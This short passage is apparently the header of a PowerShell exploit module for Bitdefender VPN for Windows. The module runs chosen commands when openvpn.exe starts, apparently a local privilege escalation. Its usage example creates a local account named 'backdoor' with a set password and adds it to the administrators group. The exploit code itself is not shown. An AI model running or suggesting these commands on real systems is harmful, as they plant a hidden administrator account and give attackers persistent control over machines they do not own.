This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Exploit module for Bitdefender VPN for Windows | |
.Parameter Command | |
Command(s) to be executed when openvpn.exe is started | |
.Example | |
Import-Module .\Invoke-ExploitBdVpnLpe.psm1 | |
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" |